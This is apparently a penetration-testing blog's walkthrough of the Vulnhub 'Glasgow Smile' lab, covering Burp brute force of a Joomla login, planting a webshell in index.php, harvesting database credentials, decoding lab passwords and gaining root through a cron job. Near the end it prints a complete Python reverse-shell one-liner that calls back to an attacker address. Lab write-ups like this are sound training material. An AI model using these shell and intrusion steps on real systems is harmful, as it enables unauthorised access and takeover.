Today we are going to solve another boot2root challenge called “Glasgow Smile”. It’s available at Vulnhub for penetration testing. This lab is an intermediate level. The credit for making this lab goes to mindsflee. Let’s get started and learn how to break it down successfully.
Since these labs are available on the Vulnhub website. Let’s download the lab file from here.
Penetration Testing Methodology
- Brute force Joomla login with Burp
- Credential theft from the database
- Abuse of crontab tasks
- Capture the flag
As always we identify the host’s IP with the “Netdiscover” tool:
So, let’s start by listing all the TCP ports with nmap.
nmap -A -p- 192.168.10.162
We start by visiting the web service (port 80), we find the image of the “Joker”, we check the source code and the robot.txt file, it seems that there is nothing useful.
With the help of Gobuster and the “big” dictionary (default in kali), we found the Joomla CMS deployed on the server:
We access the site and show the Joomla site with only one post on it, where there is a dialogue of two scenes from the film of the “Joker“
It’s time to use “joomscan” and list version, interesting directories, backup files or something that can help us identify some vulnerability.
To work more comfortably, I always recommend that you modify the /etc/hosts/ with the name of the machine. In many cases, this host will be shown to you in the site’s own source code. (Although this step is not necessary on this machine)
We run CeWL to create a custom dictionary using the words from the Joker/Arthur dialogue posted in Joomla.
We capture with Burp a request of the authentication request and take it to the “intruder” and introduce the dictionary we just created.” (You have a good tutorial about Bruteforce login with Burp here)
We start the attack, filter through “Lenght” and find a single line where its value is different. There are our credentials!
We check our credentials in the Joomla administration panel, we see that we are in as “Super Admin (Joker)“.
Our site step will be to get up a reverse shell or webshell in order to have visibility inside the server.
To do this, I didn’t get complicated, I directly modified the file “index.php” and put the code of the webshell of “pentestmonkey“.
Great! Now, we’ll put a listening netcat on port 5555 and run the command to create a reverse shell.
We run the path of the “index.php“:
If everything went well, we will have a reverse shell with the user “www-data”.
We execute the following commands to get an interactive shell. Once inside, we read the “Joomla” configuration file and get the credentials from the database. (There are always interesting things in the databases :D)
Privilege Escalation (user “rob”)
We logged on to the database, from the “batjoke” database and we will query the “taskforce” table. We make a query and see that there are several users with their passwords encoded in base64, we will only keep the user “rob“.
We decode the password from our kali and get the credentials in plain text.
We test the credentials from the SSH service and log in with the user “rob” And we can read the first flag:
Privilege Escalation (user “Abner”)
Inside the “home” of the user “rob” we find the file “Abnerineedyourhelp“. We read it and we will have the clue to get the credentials of the next user.
With the help of the “Cyberchef” website and the “rot13” module. We will be modifying the value until we get the readable text.
We repeat the previous formula, decode the password in base64 and obtain the password of the user “abner“.
We authenticate ourselves as the new user and with it, the next flag:
Privilege Escalation (user “Penguin”)
It is probably the most complicated user to get, since I focused on scaling user privileges, without finishing listing everything that was in the different folders of Joomla. For example, this hidden zip:
Download and unzip the .zip file using the user’s password “abner” (remember: I33hope99my0death000makes44more8cents00than0my0life0)
We read the file and obtain the credentials of the user “penguin“.
We authenticate with the new user “penguin” and we read the flag located in his “home“:
Privilege Escalation (root)
After getting to climb over the three users, now it’s time to get the desired “root”.
We read the file “PeopleAreStartingToNotice” (Make some coffee, you’ll need it! xD)
The Joker tells us that it is developing a program (binary find) and that it can only be executed with root permissions… Well, I’m going to save you time, since this binary is useless xD
We focus on the hidden file “.trash_old“.
I gave it a lot of thought, this “Joker” was playing with me and I didn’t know where to climb, until Pspy gave me the answer…
With this, it was already easy, we would only have to modify the file and add our line with a reverse python shell.
python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.155",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
We put a listening netcat on our kali at port 8888:
We wait a few minutes and see how the script runs in crontab:
And if all goes well, we’ll have a shell as root in our kali:
Perfect! Now, all we have to do is read the root flag.
Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn.